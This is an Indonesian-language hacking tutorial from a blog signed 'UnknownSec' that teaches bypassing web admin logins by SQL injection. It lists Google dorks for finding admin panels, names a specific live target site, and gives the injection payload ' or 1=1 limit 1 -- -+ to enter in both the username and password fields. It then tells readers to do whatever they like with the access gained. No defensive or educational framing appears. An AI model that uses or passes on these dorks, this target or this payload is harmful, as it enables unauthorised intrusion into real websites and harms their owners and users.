Hello Brother and Sister~ kali ini UnknownSec akan membahas mengenai "Bypass SQL Login"
Maksudnya gimana?
Maksudnya.. dengan memanfaatkan eror pada sql website tersebut kita dapat login ke administrator web tersebut tanpa harus memasukan username dan password yang sudah dibuat admin. Singkatnya sih
"bypass = bye bye password"
Tutorial:.
[#] Dork
inurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/
[#] Langkah-langkah
1. Cari target melalui Dork diatas diGoogle.
Live target:
http://preprojects.com/hostfriendz/int/index.php
2. Jika sudah memilih target silahkan anda coba login dengan user pass ini :
user : ' or 1=1 limit 1 -- -+
pass : ' or 1=1 limit 1 -- -+
Nah jika berhasil ya sudah deh terserah mau kalian apakan :D
Mudah bukan? ^_^
thanks to Mr Xenophobic ^_^
Sumber:
http://indocyberarmy.blogspot.co.id/2014/01/tutorial-bypass-sql-login.html
